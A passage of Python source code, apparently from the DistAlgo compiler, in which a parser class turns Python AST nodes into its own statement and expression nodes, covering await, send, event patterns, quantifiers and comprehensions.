s = self.create_stmt(dast.Function, node,
params={"name" : node.name})
n.add_assignment(s)
s.process = self.current_process
if type(s.parent) is dast.Process:
if s.name == "main":
self.current_process.entry_point = s
else:
self.current_process.methods.append(s)
elif (type(s.parent) is dast.Program and
s.name == "main"):
self.current_parent.entry_point = s
# Ignore the label decorators:
s.decorators, _, _ = self.parse_decorators(node)
self.current_block = s.body
self.signature(node.args)
self.body(node.body)
self.pop_state()
else:
# This is an event handler:
h = dast.EventHandler(self.current_parent, node)
# Parse decorators before adding h to node_stack, since decorators
# should belong to the outer scope:
h.decorators, h.labels, h.notlabels = self.parse_decorators(node)
self.push_state(h)
events, labels, notlabels = self.parse_event_handler(node)
events = self.current_process.add_events(events)
h.events = events
h.labels |= labels
h.notlabels |= notlabels
if len(h.labels) == 0:
h.labels = None
if len(h.notlabels) == 0:
h.notlabels = None
for evt in events:
evt.handlers.append(h)
for v in evt.freevars:
if v is not None:
self.debug("adding event argument %s" % v)
h.args.add_arg(v.name)
self.current_block = h.body
self.body(node.body)
self.pop_state()
def check_await(self, node):
if (isinstance(node, Call) and
isinstance(node.func, Name) and
node.func.id == KW_AWAIT):
if len(node.args) <= 2:
return True
else:
self.error("malformed await statement.", node)
return None
else:
return False
# Statements:
#
# The visit_* method for statements appends generated dast AST statements
# to self.current_block.
def create_stmt(self, stmtcls, ast, params=None, nopush=False):
"""Convenience method to instantiate a statement node and append to
'current_block'.
"""
if params is None:
stmtobj = stmtcls(parent=self.current_parent, ast=ast)
else:
stmtobj = stmtcls(parent=self.current_parent, ast=ast, **params)
stmtobj.label = self.current_label
self.current_label = None
if self.current_block is None or self.current_parent is None:
self.error("Statement not allowed in this context.", ast)
else:
self.current_block.append(stmtobj)
if not nopush:
self.push_state(stmtobj)
self.current_context = Read()
return stmtobj
def create_expr(self, exprcls, ast, params=None, nopush=False):
"""Convenience method to instantiate an expression node.
"""
if params is None:
expr = exprcls(self.current_parent, ast=ast)
else:
expr = exprcls(self.current_parent, ast=ast, **params)
if not nopush:
self.push_state(expr)
return expr
def visit_Assign(self, node):
stmtobj = self.create_stmt(dast.AssignmentStmt, node)
self.current_context = Read()
stmtobj.value = self.visit(node.value)
self.current_context = Assignment(stmtobj.value)
for target in node.targets:
stmtobj.targets.append(self.visit(target))
self.pop_state()
def visit_AugAssign(self, node):
stmtobj = self.create_stmt(dast.OpAssignmentStmt, node,
params={'op':OperatorMap[type(node.op)]})
self.current_context = Read()
valexpr = self.visit(node.value)
self.current_context = Assignment(valexpr)
tgtexpr = self.visit(node.target)
stmtobj.target = tgtexpr
stmtobj.value = valexpr
self.pop_state()
def visit_ImportFrom(self, node):
if type(self.current_parent) is not dast.Program:
self.error("'import' statement is only allowed at the top level.",
node)
return
stmtobj = self.create_stmt(dast.PythonStmt, node)
for alias in node.names:
if alias.asname is not None:
name = alias.asname
else:
name = alias.name
nobj = self.current_scope.add_name(name)
nobj.add_assignment(stmtobj)
self.pop_state()
visit_Import = visit_ImportFrom
def expr_check(self, name, minargs, maxargs, node,
keywords={}, optional_keywords={}):
if not (isinstance(node, Call) and
isinstance(node.func, Name) and
node.func.id == name):
return False
errmsg = None
if len(node.args) >= minargs and len(node.args) <= maxargs:
if keywords is None:
return True
for kw in node.keywords:
if kw.arg in keywords:
keywords -= {kw.arg}
elif kw.arg not in optional_keywords:
errmsg = "unrecognized keyword in %s statement." % name
break
if errmsg is None:
if len(keywords) > 0:
errmsg = ("missing required keywords: " + keywords +
" in " + name + " statement.")
else:
return True
else:
errmsg = "Malformed %s statement." % name
self.error(errmsg, node)
raise MalformedStatementError
def kw_check(self, node, names):
if not isinstance(node, Name):
return False
if node.id not in names:
return False
return True
def parse_message(self, node):
expr = dast.TupleExpr(self.current_parent, node)
if type(node) is Call:
assert type(node.func) is Name
elem = dast.ConstantExpr(self.current_parent, node.func)
elem.value = node.func.id
expr.subexprs.append(elem)
elts = node.args
else:
elts = node.elts
for elt in elts:
expr.subexprs.append(self.visit(elt))
return expr
def visit_Expr(self, node):
l = extract_label(node.value)
if l is not None and self.current_process is not None:
self.current_label = l
return
stmtobj = None
try:
e = node.value
if self.expr_check(KW_AWAIT, 1, 2, e,
keywords={},
optional_keywords={KW_AWAIT_TIMEOUT}):
stmtobj = self.create_stmt(dast.AwaitStmt, node)
branch = dast.Branch(stmtobj, node,
condition=self.visit(e.args[0]))
stmtobj.branches.append(branch)
if len(e.args) == 2:
stmtobj.timeout = self.visit(e.args[1])
if len(e.keywords) > 0:
if stmtobj.timeout is not None:
self.warn(
"duplicate timeout value in await statement.",
e)
stmtobj.timeout = self.visit(kw.value)
elif self.expr_check(KW_SEND, 1, 1, e, keywords={KW_SEND_TO}):
stmtobj = self.create_stmt(dast.SendStmt, node)
stmtobj.message = self.parse_message(e.args[0])
stmtobj.target = self.visit(e.keywords[0].value)
elif self.expr_check(KW_BROADCAST, 1, 1, e, keywords={KW_SEND_TO}):
stmtobj = self.create_stmt(dast.SendStmt, node)
stmtobj.message = self.parse_message(e.args[0])
stmtobj.target = self.visit(e.keywords[0].value)
elif self.expr_check(KW_PRINT, 1, 2, e):
stmtobj = self.create_stmt(dast.OutputStmt, node)
stmtobj.message = self.visit(e.args[0])
if len(e.args) == 2:
stmtobj.level = self.visit(e.args[1])
elif self.current_process is not None and \
self.expr_check(KW_RESET, 0, 1, e):
stmtobj = self.create_stmt(dast.ResetStmt, node)
if len(e.args) > 0:
stmtobj.expr = self.visit(e.args[0])
if not isinstance(stmtobj.expr, dast.ConstantExpr):
self.error("Invalid argument in reset statement.", e)
elif stmtobj.expr.value not in ValidResetTypes:
self.error("Unknown argument in reset statement. "
"Valid arguments are: " +
str(ValidResetTypes), node)
elif (isinstance(self.current_parent, dast.Process) and
self.expr_check(KW_CONFIG, 0, 0, e, keywords=None)):
self.current_process.configurations.extend(
self.parse_config_section(e))
# 'yield' and 'yield from' should be statements, handle them here:
elif type(e) is Yield:
stmtobj = self.create_stmt(dast.YieldStmt, node)
stmtobj.expr = self.visit(e)
elif type(e) is YieldFrom:
# 'yield' should be a statement, handle it here:
stmtobj = self.create_stmt(dast.YieldFromStmt, node)
stmtobj.expr = self.visit(e)
else:
stmtobj = self.create_stmt(dast.SimpleStmt, node)
stmtobj.expr = self.visit(node.value)
except MalformedStatementError:
# already errored in expr_check so just ignore:
pass
finally:
if stmtobj is not None:
self.pop_state()
# ~~~
def visit_If(self, node):
stmtobj = None
try:
if self.expr_check(KW_AWAIT, 1, 1, node.test):
stmtobj = self.create_stmt(dast.AwaitStmt, node)
branch = dast.Branch(stmtobj, node.test,
condition=self.visit(node.test.args[0]))
self.current_block = branch.body
self.body(node.body)
stmtobj.branches.append(branch)
while True:
else_ = node.orelse
if len(else_) == 1 and isinstance(else_[0], If):
node = else_[0]
if self.expr_check(KW_AWAIT_TIMEOUT, 1 ,1, node.test):
stmtobj.timeout = self.visit(node.test.args[0])
self.current_block = stmtobj.orelse
self.body(node.body)
if len(node.orelse) > 0:
self.error("timeout branch must be the last"
" branch of await statement", node)
else:
branch = dast.Branch(stmtobj, node,
condition=self.visit(node.test))
self.current_block = branch.body
self.body(node.body)
stmtobj.branches.append(branch)
elif len(else_) == 0:
break
else:
self.current_block = stmtobj.orelse
self.body(else_)
break
else:
stmtobj = self.create_stmt(dast.IfStmt, node)
stmtobj.condition = self.visit(node.test)
self.current_block = stmtobj.body
self.body(node.body)
self.current_block = stmtobj.elsebody
self.body(node.orelse)
except MalformedStatementError:
pass
finally:
if stmtobj is not None:
self.pop_state()
def visit_For(self, node):
s = self.create_stmt(dast.ForStmt, node)
self.current_context = Assignment()
s.domain = self.parse_domain_spec(node)
self.current_context = Read()
self.current_block = s.body
self.body(node.body)
self.current_block = s.elsebody
self.body(node.orelse)
self.pop_state()
def visit_While(self, node):
if self.expr_check(KW_AWAIT, 1, 2, node.test,
optional_keywords={KW_AWAIT_TIMEOUT}):
s = self.create_stmt(dast.LoopingAwaitStmt, node)
s.condition = self.visit(node.test.args[0])
if len(node.test.args) == 2:
s.timeout = self.visit(node.test.args[1])
else:
s = self.create_stmt(dast.WhileStmt, node)
s.condition = self.visit(node.test)
self.current_block = s.body
self.body(node.body)
if hasattr(s, "elsebody"):
self.current_block = s.elsebody
self.body(node.orelse)
self.pop_state()
def visit_With(self, node):
s = self.create_stmt(dast.WithStmt, node)
for item in node.items:
self.current_context = Read()
ctxexpr = self.visit(item.context_expr)
if item.optional_vars is not None:
self.current_context = Assignment(ctxexpr)
s.items.append((ctxexpr, self.visit(item.optional_vars)))
else:
s.items.append((ctxexpr, None))
self.current_context = Read()
self.current_block = s.body
self.body(node.body)
self.pop_state()
def visit_Pass(self, node):
self.create_stmt(dast.PassStmt, node, nopush=True)
def visit_Break(self, node):
loop = self.current_loop
if loop is None:
self.warn("Possible use of 'break' outside loop.", node)
self.create_stmt(dast.BreakStmt, node, nopush=True,
params={"loopstmt": loop})
def visit_Continue(self, node):
loop = self.current_loop
if loop is None:
self.warn("Possible use of 'continue' outside loop.", node)
self.create_stmt(dast.ContinueStmt, node, nopush=True,
params={"loopstmt": loop})
def visit_Delete(self, node):
s = self.create_stmt(dast.DeleteStmt, node)
self.current_context = Delete()
for target in node.targets:
s.targets.append(self.visit(target))
self.pop_state()
def visit_Try(self, node):
s = self.create_stmt(dast.TryStmt, node)
self.current_block = s.body
self.body(node.body)
self.current_context = Read()
for handler in node.handlers:
h = dast.ExceptHandler(s, handler)
h.name = handler.name
if h.name is not None:
n = self.current_scope.find_name(h.name)
if n is None:
self.current_scope.add_name(h.name)
n.add_assignment(s)
if handler.type is not None:
h.type = self.visit(handler.type)
self.current_block = h.body
self.body(handler.body)
s.excepthandlers.append(h)
self.current_block = s.elsebody
self.body(node.orelse)
self.current_block = s.finalbody
self.body(node.finalbody)
self.pop_state()
def visit_Assert(self, node):
s = self.create_stmt(dast.AssertStmt, node)
s.expr = self.visit(node.test)
if node.msg is not None:
s.msg = self.visit(node.msg)
self.pop_state()
def visit_Global(self, node):
if self.current_process is not None:
self.warn("'global' statement inside process is redundant and "
"ignored.", node)
else:
self.create_stmt(dast.GlobalStmt, node,
{"names": list(node.names)})
for name in node.names:
localname = self.current_scope.find_name(name, local=True)
if localname is not None:
self.warn("name '%s' used before declared 'global'." %
name, node)
nobj = self.program.find_name(name)
if nobj is None:
nobj = self.program.add_name(name)
self.debug("Linking global name '%s'" % name)
self.current_scope.link_name(nobj)
self.pop_state()
def visit_Nonlocal(self, node):
self.create_stmt(dast.NonlocalStmt, node, {"names": list(node.names)})
if self.current_scope.parent_scope is None:
self.error("No nonlocal scope found.", node)
else:
for name in node.names:
nobj = self.current_scope.find_name(name, local=True)
if nobj is not None:
self.warn("Variable '%s' used before declared 'nonlocal'." %
name, node)
nobj = self.current_scope.parent_scope.find_name(name, local=False)
if nobj is None:
self.warn("Unable to determine scope for nonlocal var %s" %
name, node)
else:
self.debug("Linking nonlocal name '%s'" % name)
self.current_scope.link_name(nobj)
self.pop_state()
def visit_Return(self, node):
s = self.create_stmt(dast.ReturnStmt, node)
if node.value is not None:
s.value = self.visit(node.value)
self.pop_state()
def visit_Raise(self, node):
s = self.create_stmt(dast.RaiseStmt, node)
if node.exc is not None:
s.expr = self.visit(node.exc)
if node.cause is not None:
s.cause = self.visit(node.cause)
self.pop_state()
# Expressions:
#
# The visit_* methods for expressions return the newly
# constructed dast AST node
def visit_Attribute(self, node):
if (isinstance(self.current_context, FunCall) and
node.attr in KnownUpdateMethods):
# Calling a method that is known to update an object's state is an
# Update operation:
self.current_context = Update()
expr = self.create_expr(dast.AttributeExpr, node)
if type(self.current_context) is Assignment:
# Assigning to an attribute of an object updates that object:
self.current_context = Update()
expr.value = self.visit(node.value)
expr.attr = node.attr
self.pop_state()
if isinstance(expr.value, dast.SelfExpr):
# Need to update the namedvar object
n = self.current_process.find_name(expr.attr)
if n is None:
if (self.is_in_setup() and
isinstance(self.current_context, Assignment)):
self.debug("Adding name '%s' to process scope"
" from setup()." % expr.attr, node)
n = self.current_process.add_name(expr.attr)
n.add_assignment(expr)
n.set_scope(self.current_process)
else:
self.error("Undefined process state variable: " +
str(expr.attr), node)
else:
if isinstance(self.current_context, Assignment):
self.debug("Assignment to variable '%s'" % str(n), node)
n.add_assignment(expr)
elif isinstance(self.current_context, Update) or \
isinstance(self.current_context, Delete):
self.debug("Update to process variable '%s'" % str(n), node)
n.add_update(expr)
else:
n.add_read(expr)
return expr
def ensure_one_arg(self, name, node):
l = len(node.args)
if l != 1:
self.error("'%s' takes exactly one argument (%d given)" % (name, l),
node)
return False
return True
def ensure_sequence_arg(self, name, node):
l = len(node.args)
if l > 1:
self.error("'%s' takes zero or one argument (%d given)" % (name, l),
node)
return False
if l == 1 and not hasattr(node.args[0], "elts"):
return False
return True
def parse_event_expr(self, node, literal=False):
if (node.starargs is not None or node.kwargs is not None):
self.warn("extraneous arguments in event expression.", node)
pattern = self.parse_pattern_expr(node.args[0], literal)
if node.func.id == KW_RECV_QUERY:
event = dast.Event(self.current_process,
event_type=dast.ReceivedEvent,
pattern=pattern)
elif node.func.id == KW_SENT_QUERY:
event = dast.Event(self.current_process,
event_type=dast.SentEvent,
pattern=pattern)
else:
self.error("unknown event specifier", node)
return None
for kw in node.keywords:
pat = self.parse_pattern_expr(kw.value, literal)
if kw.arg == KW_EVENT_SOURCE:
event.sources.append(pat)
elif kw.arg == KW_EVENT_DESTINATION:
event.destinations.append(pat)
elif kw.arg == KW_EVENT_TIMESTAMP:
event.timestamps.append(pat)
else:
self.warn("unknown keyword in query.", node)
return self.current_process.add_event(event)
def event_from_pattern(self, node, event_type):
assert isinstance(node, dast.PatternExpr)
pattern = node.pattern
assert isinstance(pattern, dast.TuplePattern)
event = dast.Event(self.current_process,
event_type=event_type)
if self.full_event_pattern:
if len(pattern.value) != 3:
self.error("malformed event pattern.", node)
else:
event.pattern = dast.PatternExpr(node.parent,
pattern=pattern.value[2])
envpat = pattern.value[1]
if isinstance(envpat, dast.TuplePattern):
if len(envpat.value) != 3:
self.warn("possible malformed envelope pattern.", node)
else:
event.timestamps.append(
dast.PatternExpr(node.parent,
pattern=envpat.value[0]))
event.destinations.append(
dast.PatternExpr(node.parent,
pattern=envpat.value[1]))
event.sources.append(
dast.PatternExpr(node.parent,
pattern=envpat.value[2]))
else:
if len(pattern.value) != 2:
self.error("malformed event pattern.", node)
else:
event.pattern = dast.PatternExpr(node.parent,
pattern=pattern.value[0])
event.sources.append(
dast.PatternExpr(node.parent, pattern=pattern.value[1]))
return self.current_process.add_event(event)
def pattern_from_event(self, node, literal=False):
if not isinstance(node, dast.Event):
return None
expr = self.create_expr(dast.PatternExpr if not literal else
dast.LiteralPatternExpr,
node.ast)
pattern = dast.TuplePattern(node.parent)
# Pattern structure:
# (TYPE, ENVELOPE, MESSAGE)
# ENVELOPE: (TIMESTAMP, DESTINATION, SOURCE)
if isinstance(node.type, dast.EventType):
pattern.value.append(
dast.ConstantPattern(
pattern,
value=self.current_scope.add_name(
node.type.__name__)))
else:
pattern.value.append(dast.FreePattern(pattern))
env = dast.TuplePattern(pattern)
if (len(node.timestamps) == 0):
env.value.append(dast.FreePattern(env))
elif len(node.timestamps) == 1:
env.value.append(node.timestamps[0].pattern.clone())
env.value[-1]._parent = env
else:
self.error("multiple timestamp spec in event pattern.", node)
if (len(node.destinations) == 0):
env.value.append(dast.FreePattern(env))
elif len(node.destinations) == 1:
env.value.append(node.destinations[0].pattern.clone())
env.value[-1]._parent = env
else:
self.error("multiple destination spec in event pattern.", node)
if (len(node.sources) == 0):
env.value.append(dast.FreePattern(env))
elif len(node.sources) == 1:
env.value.append(node.sources[0].pattern.clone())
env.value[-1]._parent = env
else:
self.error("multiple source spec in event pattern.", node)
pattern.value.append(env)
if node.pattern is None:
msgpat = dast.FreePattern(pattern)
else:
msgpat = node.pattern.pattern.clone()
msgpat._parent = pattern
pattern.value.append(msgpat)
expr.pattern = pattern
self.pop_state()
return expr
def call_check(self, names, minargs, maxargs, node):
if (isinstance(node.func, Name) and node.func.id in names):
if ((minargs is not None and len(node.args) < minargs) or
(maxargs is not None and len(node.args) > maxargs)):
self.error("Malformed %s expression." % node.func.id, node)
return False
else:
return True
return False
def parse_domain_spec(self, node):
if (self.current_process is not None and
isinstance(node, Call) and
self.call_check({KW_RECV_QUERY, KW_SENT_QUERY}, 1, 1, node)):
# As a short hand, "sent" and "rcvd" can be used as a domain spec:
# some(rcvd(EVENT_PATTERN) | PRED) is semantically equivalent to
# some(EVENT_PATTERN in rcvd | PRED).
expr = self.create_expr(dast.DomainSpec, node)
event = self.parse_event_expr(node, literal=False)
if event is not None:
event.record_history = True
expr.pattern = self.pattern_from_event(event)
if node.func.id == KW_RECV_QUERY:
expr.domain = self.create_expr(dast.ReceivedExpr, node)
else:
expr.domain = self.create_expr(dast.SentExpr, node)
expr.domain.event = event
self.pop_state()
self.pop_state()
return expr
elif (isinstance(node, Compare) and len(node.ops) == 1 and
type(node.ops[0]) is In):
expr = self.create_expr(dast.DomainSpec, node)
self.current_context = Assignment()
expr.pattern = self.parse_pattern_expr(node.left)
self.current_context = IterRead(expr.pattern)
expr.domain = self.visit(node.comparators[0])
self.pop_state()
return expr
elif isinstance(node, comprehension) or isinstance(node, For):
expr = self.create_expr(dast.DomainSpec, node)
self.current_context = Assignment()
if self.enable_iterator_pattern:
expr.pattern = self.parse_pattern_expr(node.target)
else:
expr.pattern = self.visit(node.target)
self.current_context = IterRead(expr.pattern)
expr.domain = self.visit(node.iter)
if isinstance(expr.domain, dast.HistoryExpr):
expr.pattern = self.pattern_from_event(expr.domain.event)
self.pop_state()
return expr
else:
raise MalformedStatementError("malformed domain specifier.")
def parse_quantified_expr(self, node):
if node.func.id == KW_EXISTENTIAL_QUANT:
context = dast.ExistentialOp
elif node.func.id == KW_UNIVERSAL_QUANT:
context = dast.UniversalOp
else:
raise MalformedStatementError("Unknown quantifier.")
expr = self.create_expr(dast.QuantifiedExpr, node, {'op': context})
self.enter_query()
try:
expr.domains, predicates = self.parse_domains_and_predicate(node)
if len(predicates) > 1:
self.warn("Multiple predicates in quantified expression, "
"first one is used, the rest are ignored.", node)
expr.predicate = predicates[0]
finally:
self.leave_query(node)
self.pop_state()
return expr
def parse_comprehension(self, node):
if node.func.id == KW_COMP_SET:
expr_type = dast.SetCompExpr
elif node.func.id == KW_COMP_LIST:
expr_type = dast.ListCompExpr
elif node.func.id == KW_COMP_DICT:
expr_type = dast.DictCompExpr
elif node.func.id == KW_COMP_TUPLE:
expr_type = dast.TupleCompExpr
expr = self.create_expr(expr_type, node)
self.enter_query()
first_arg = node.args[0]
node.args = node.args[1:]
try:
expr.domains, expr.conditions = self.parse_domains_and_predicate(node)
if expr_type is dast.DictCompExpr:
if not (isinstance(first_arg, Tuple) and
len(first_arg.elts) == 2):
self.error("Malformed element in dict comprehension.",
first_arg)
else:
kv = dast.KeyValue(expr)
kv.key = self.visit(node.key)
kv.value = self.visit(node.value)
expr.elem = kv
else:
expr.elem = self.visit(first_arg)
finally:
self.leave_query(node)
self.pop_state()
return expr
def audit_query(self, expr, node):
self.debug("auditing " + str(expr), node)
self.debug("...freevars: " + str(expr.freevars), node)
self.debug("...boundvars: " + str(expr.boundvars), node)
intersect = {v.name for v in expr.ordered_freevars} & \
{v.name for v in expr.ordered_boundvars}
if intersect:
msg = ("query variables " +
" ".join(["'" + n + "'" for n in intersect]) +
" are both free and bound.")
self.error(msg, node)
def parse_aggregates(self, node):
if node.func.id == KW_AGGREGATE_SUM:
expr_type = dast.SumExpr
elif node.func.id == KW_AGGREGATE_SIZE:
expr_type = dast.SizeExpr
elif node.func.id == KW_AGGREGATE_MIN:
expr_type = dast.MinExpr
elif node.func.id == KW_AGGREGATE_MAX:
expr_type = dast.MaxExpr
expr = self.create_expr(expr_type, node)
first_arg = node.args[0]
node.args = node.args[1:]
try:
expr.domains, expr.conditions = self.parse_domains_and_predicate(node)
expr.elem = self.visit(first_arg)
finally:
self.pop_state()
return expr
def parse_domains_and_predicate(self, node):
preds = []
# Find predicate:
for kw in node.keywords:
if kw.arg == KW_SUCH_THAT:
preds.append(kw.value)
else:
self.error("Unknown keyword '%s' in comprehension expression." %
kw.arg, node)
# ..if no predicate found, then default to True:
if len(preds) == 0:
preds= [NameConstant(True)]
domains = node.args
if len(domains) == 0:
self.warn("No domain specifiers in comprehension expression.", node)
dadomains = [self.parse_domain_spec(node) for node in domains]
self.current_context = Read()
dapredicates = [self.visit(pred) for pred in preds]
return dadomains, dapredicates
def parse_config_section(self, node):
res = []
for kw in node.keywords:
key = kw.arg
vnode = kw.value
value = None
if isinstance(vnode, Name):
value = vnode.id
elif isinstance(vnode, Num):
value = vnode.n
elif isinstance(vnode, Str) or isinstance(vnode, Bytes):
value = vnode.s
elif isinstance(vnode, NameConstant):
value = vnode.value
else:
self.error("Invalid configuration value.", vnode)
if value is not None:
res.append((key, value))
return res
def visit_Call(self, node):
if self.call_check(Quantifiers, 1, None, node):
try:
return self.parse_quantified_expr(node)
except MalformedStatementError as e:
self.error("Malformed quantification expression: " + str(e),
node)
return dast.SimpleExpr(self.current_parent, node)
if self.call_check(ComprehensionTypes, 2, None, node):
try:
return self.parse_comprehension(node)
except MalformedStatementError as e:
self.error("Malformed comprehension expression: " + str(e),
node)
return dast.SimpleExpr(self.current_parent, node)
if (self.current_process is not None and
self.call_check({KW_RECV_QUERY, KW_SENT_QUERY}, 1, 1, node)):
if isinstance(self.current_context, IterRead):
if node.func.id == KW_RECV_QUERY:
expr = self.create_expr(dast.ReceivedExpr, node)
else:
expr = self.create_expr(dast.SentExpr, node)
expr.context = self.current_context.type
expr.event = self.parse_event_expr(
node, literal=(not self.enable_iterator_pattern))
self.pop_state()
if expr.event is not None:
expr.event.record_history = True
return expr
else:
outer = self.create_expr(dast.ComparisonExpr, node)
outer.comparator = dast.InOp
if node.func.id == KW_RECV_QUERY:
expr = self.create_expr(dast.ReceivedExpr, node)
else:
expr = self.create_expr(dast.SentExpr, node)
if self.current_context is not None:
expr.context = self.current_context.type
event = self.parse_event_expr(
node, literal=(not self.enable_membertest_pattern))
self.pop_state()
expr.event = event
outer.right = expr
if event is not None:
outer.left = self.pattern_from_event(
event, literal=(not self.enable_membertest_pattern))
event.record_history = True
self.pop_state()
return outer
if self.call_check(ApiMethods, None, None, node):
self.debug("Api method call: " + node.func.id, node)
expr = self.create_expr(dast.ApiCallExpr, node)
expr.func = node.func.id
elif self.call_check(BuiltinMethods, None, None, node):
self.debug("Builtin method call: " + node.func.id, node)
expr = self.create_expr(dast.BuiltinCallExpr, node)
expr.func = node.func.id
else:
if isinstance(node.func, Name):
self.debug("Method call: " + str(node.func.id), node)
expr = self.create_expr(dast.CallExpr, node)
self.current_context = FunCall()
expr.func = self.visit(node.func)
self.current_context = Read()
expr.args = [self.visit(a) for a in node.args]
expr.keywords = [(kw.arg, self.visit(kw.value))
for kw in node.keywords]
expr.starargs = self.visit(node.starargs) \
if node.starargs is not None else None
expr.kwargs = self.visit(node.kwargs) \
if node.kwargs is not None else None
self.pop_state()
return expr
def visit_Name(self, node):
if node.id in {KW_TRUE, KW_FALSE, KW_NULL}:
if type(self.current_context) in {Assignment, Update, Delete}:
self.warn("Constant expression in update context.", node)
if node.id == KW_TRUE:
return self.create_expr(dast.TrueExpr, node, nopush=True)
elif node.id == KW_FALSE:
return self.create_expr(dast.FalseExpr, node, nopush=True)
elif node.id == KW_NULL:
return self.create_expr(dast.NoneExpr, node, nopush=True)
if self.current_process is not None and node.id == KW_SELF:
return self.create_expr(dast.SelfExpr, node, nopush=True)
if (self.current_process is not None and
(node.id in {KW_RECV_QUERY, KW_SENT_QUERY})):
if node.id == KW_RECV_QUERY:
expr = self.create_expr(dast.ReceivedExpr, node)
event_type = dast.ReceivedEvent
else:
expr = self.create_expr(dast.SentExpr, node)
event_type = dast.SentEvent
if (isinstance(self.current_context, Read) and
isinstance(self.current_context.type, dast.PatternExpr)):
expr.context = self.current_context.type
event = self.event_from_pattern(expr.context, event_type)
expr.event = event
event.record_history = True
else:
self.error("Invalid context for '%s'" % node.id, node)
self.pop_state()
return expr
# NamedVar is not by itself an Expression, we'll have to wrap it in a
# SimpleExpr:
expr = self.create_expr(dast.SimpleExpr, node)
if isinstance(self.current_context, Assignment):
n = self.current_scope.find_name(node.id, local=False)
if n is None:
self.debug("Adding name %s to %s" % (node.id,
self.current_scope), node)
n = self.current_scope.add_name(node.id)
n.add_assignment(expr)
elif isinstance(self.current_context, Update) or\
isinstance(self.current_context, Delete):
n = self.current_scope.find_name(node.id, local=False)
if n is None:
self.warn("Possible use of uninitialized variable '%s'" %
node.id, node)
self.debug(str(self.current_scope.parent_scope), node)
n = self.current_scope.add_name(node.id)
n.add_update(expr)
elif isinstance(self.current_context, Read) or \
isinstance(self.current_context, FunCall):
n = self.current_scope.find_name(node.id, local=False)
if n is None:
self.warn("Possible use of uninitialized variable '%s'" %
node.id, node)
self.debug(str(self.current_scope.parent_scope), node)
if self.current_scope.parent_scope is not None:
self.debug(self.current_scope.parent_scope._names, node)
else:
self.debug(self.current_scope._names, node)
n = self.current_scope.add_name(node.id)
n.add_read(expr)
expr.value = n
self.pop_state()
return expr
def visit_Str(self, node):
expr = self.create_expr(dast.ConstantExpr, node)
expr.value = node.s
self.pop_state()
return expr
def visit_Bytes(self, node):
expr = self.create_expr(dast.ConstantExpr, node)
expr.value = node.s
self.pop_state()
return expr
def visit_Num(self, node):
expr = self.create_expr(dast.ConstantExpr, node)
expr.value = node.n
self.pop_state()
return expr
# Since Python 3.4:
def visit_NameConstant(self, node):
if node.value == True:
return self.create_expr(dast.TrueExpr, node, nopush=True)
elif node.value == False:
return self.create_expr(dast.FalseExpr, node, nopush=True)
elif node.value == None:
return self.create_expr(dast.NoneExpr, node, nopush=True)
else:
raise NotImplementedError("Unrecognized NameConstant %s." % repr(node.value))
def visit_Tuple(self, node):
expr = self.create_expr(dast.TupleExpr, node)
for item in node.elts:
expr.subexprs.append(self.visit(item))
self.pop_state()
return expr
def visit_List(self, node):
expr = self.create_expr(dast.ListExpr, node)
for item in node.elts:
expr.subexprs.append(self.visit(item))
self.pop_state()
return expr
def visit_Set(self, node):
expr = self.create_expr(dast.SetExpr, node)
for item in node.elts:
expr.subexprs.append(self.visit(item))
self.pop_state()
return expr
def visit_Dict(self, node):
expr = self.create_expr(dast.DictExpr, node)
for key in node.keys:
expr.keys.append(self.visit(key))
for value in node.values:
expr.values.append(self.visit(value))
self.pop_state()
return expr
def visit_BinOp(self, node):
e = self.create_expr(dast.BinaryExpr, node,
{"op": OperatorMap[type(node.op)]})
e.left = self.visit(node.left)
e.right = self.visit(node.right)
self.pop_state()
return e
def visit_BoolOp(self, node):
e = self.create_expr(dast.LogicalExpr, node,
{"op": OperatorMap[type(node.op)]})
for v in node.values:
e.subexprs.append(self.visit(v))
self.pop_state()
return e
def visit_Compare(self, node):
if len(node.ops) > 1:
self.error("Explicit parenthesis required in comparison expression",
node)
return None
outer = None
# We make all negation explicit:
if type(node.ops[0]) in NegatedOperators:
outer = self.create_expr(dast.LogicalExpr, node)
outer.operator = dast.NotOp
expr = self.create_expr(dast.ComparisonExpr, node)
if self.enable_membertest_pattern:
# DistAlgo: overload "in" to allow pattern matching
if isinstance(node.ops[0], In) or \
isinstance(node.ops[0], NotIn):
# Backward compatibility: only assume pattern if containing free
# var
pf = PatternFinder()
pf.visit(node.left)
if pf.found:
expr.left = self.parse_pattern_expr(node.left)
if expr.left is None:
expr.left = self.visit(node.left)
self.current_context = Read(expr.left)
expr.right = self.visit(node.comparators[0])
if (isinstance(expr.right, dast.HistoryExpr) and
expr.right.event is not None):
# Must replace short pattern format with full pattern here:
expr.left = self.pattern_from_event(expr.right.event)
if outer is not None:
expr.comparator = NegatedOperators[type(node.ops[0])]
outer.subexprs.append(expr)
self.pop_state()
self.pop_state()
return outer
else:
expr.comparator = OperatorMap[type(node.ops[0])]
self.pop_state()
return expr
def visit_UnaryOp(self, node):
if type(node.op) is Not:
expr = self.create_expr(dast.LogicalExpr, node, {"op": dast.NotOp})
expr.subexprs.append(self.visit(node.operand))
else:
expr = self.create_expr(dast.UnaryExpr, node,
{"op": OperatorMap[type(node.op)]})
expr.right = self.visit(node.operand)
self.pop_state()
return expr
def visit_Subscript(self, node):
expr = self.create_expr(dast.SubscriptExpr, node)
expr.value = self.visit(node.value)
self.current_context = Read()
expr.index = self.visit(node.slice)
self.pop_state()
return expr
def visit_Index(self, node):
return self.visit(node.value)
def visit_Slice(self, node):
expr = self.create_expr(dast.SliceExpr, node)
if node.lower is not None:
expr.lower = self.visit(node.lower)
if node.upper is not None:
expr.upper = self.visit(node.upper)
if node.step is not None:
expr.step = self.visit(node.step)
self.pop_state()
return expr
def visit_ExtSlice(self, node):
self.warn("ExtSlice in subscript not supported.", node)
return self.context_expr(dast.PythonExpr, node, nopush=True)
def visit_Yield(self, node):
# Should not get here: 'yield' statements should have been handles by
# visit_Expr
self.error("unexpected 'yield' expression.", node)
return self.create_expr(dast.PythonExpr, node, nopush=True)
def visit_YieldFrom(self, node):
# Should not get here: 'yield from' statements should have been
# handles by visit_Expr
self.error("unexpected 'yield from' expression.", node)
return self.create_expr(dast.PythonExpr, node, nopush=True)
def visit_Lambda(self, node):
expr = self.create_expr(dast.LambdaExpr, node)
self.signature(node.args)
expr.body = self.visit(node.body)
self.pop_state()
return expr
def visit_Ellipsis(self, node):
return self.create_expr(dast.EllipsisExpr, node, nopush=True)
def generator_visit(self, node):
if isinstance(node, SetComp):
expr = self.create_expr(dast.SetCompExpr, node)
elif isinstance(node, ListComp):
expr = self.create_expr(dast.ListCompExpr, node)
elif isinstance(node, DictComp):
